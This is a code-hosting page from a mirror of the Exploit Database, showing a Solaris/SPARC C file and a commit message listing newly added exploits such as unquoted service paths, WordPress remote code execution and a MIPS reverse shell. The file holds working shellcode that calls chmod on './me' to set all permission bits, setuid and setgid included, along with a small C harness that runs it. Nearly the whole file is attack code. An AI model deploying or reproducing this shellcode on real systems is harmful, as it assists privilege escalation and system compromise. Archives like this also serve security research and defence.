bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/solaris_sparc/50749.c
Offensive Security f2d7e05ad0 DB: 2022-02-19 
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
2022-02-19 05:01:36 +00:00

29 lines
No EOL
802 B
C
Raw Blame History

/*
* sparc_solaris_chmod2.c - Solaris/SPARC chmod() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Very small Solaris/SPARC chmod shellcode. See also:
* http://phrack.org/issues/70/13.html#article
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
/* chmod("./me", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x20\xbf\xff\xff" /* bn,a <sc + 4> */
"\x7f\xff\xff\xff" /* call <sc + 8> */
"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"./me";
void main()
{
void (*f)() = (void *)sc;
f();
}
Reference in a new issue View git blame Copy permalink